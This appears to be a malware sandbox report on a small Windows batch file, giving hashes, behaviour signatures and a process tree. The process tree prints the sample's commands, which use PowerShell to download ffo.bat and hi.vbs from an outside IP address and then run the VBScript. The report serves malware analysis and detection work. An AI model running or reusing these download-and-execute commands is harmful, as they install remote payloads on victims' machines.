Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-09-2024 01:13
Static task
static1
Behavioral task
behavioral1
Sample
1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e.bat
Resource
win10v2004-20240802-en
General
-
Target
1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e.bat
-
Size
191B
-
MD5
4d8b2d19bdd29e6d89e0769cff9b0b48
-
SHA1
07c4469751a5ddf43288b8ea7d32afce71783a2c
-
SHA256
1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
-
SHA512
dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2880 powershell.exe 2884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2880 2792 cmd.exe 31 PID 2792 wrote to memory of 2880 2792 cmd.exe 31 PID 2792 wrote to memory of 2880 2792 cmd.exe 31 PID 2792 wrote to memory of 2884 2792 cmd.exe 32 PID 2792 wrote to memory of 2884 2792 cmd.exe 32 PID 2792 wrote to memory of 2884 2792 cmd.exe 32 PID 2792 wrote to memory of 2592 2792 cmd.exe 33 PID 2792 wrote to memory of 2592 2792 cmd.exe 33 PID 2792 wrote to memory of 2592 2792 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\Admin\AppData\Roaming/ffo.bat2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\Admin\AppData\Roaming/hi.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Roaming/hi.vbs2⤵PID:2592
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cedcabfd9f8248efb0dfb09a438ad7c0
SHA18de15de416ba9e4c13f00a16145098b3157619f7
SHA25611effaf56da0e2841b08d8c937641eb0f1fad8ed7a222cab83a410dead15f80c
SHA5129d252a56a17ca5763bc289519573f51a702246b653256f71afebf6c0df5af7264071bdd2d200196eec81194382b7bac0a9fabdf6e1acbb3c998ea6f2db1d7a70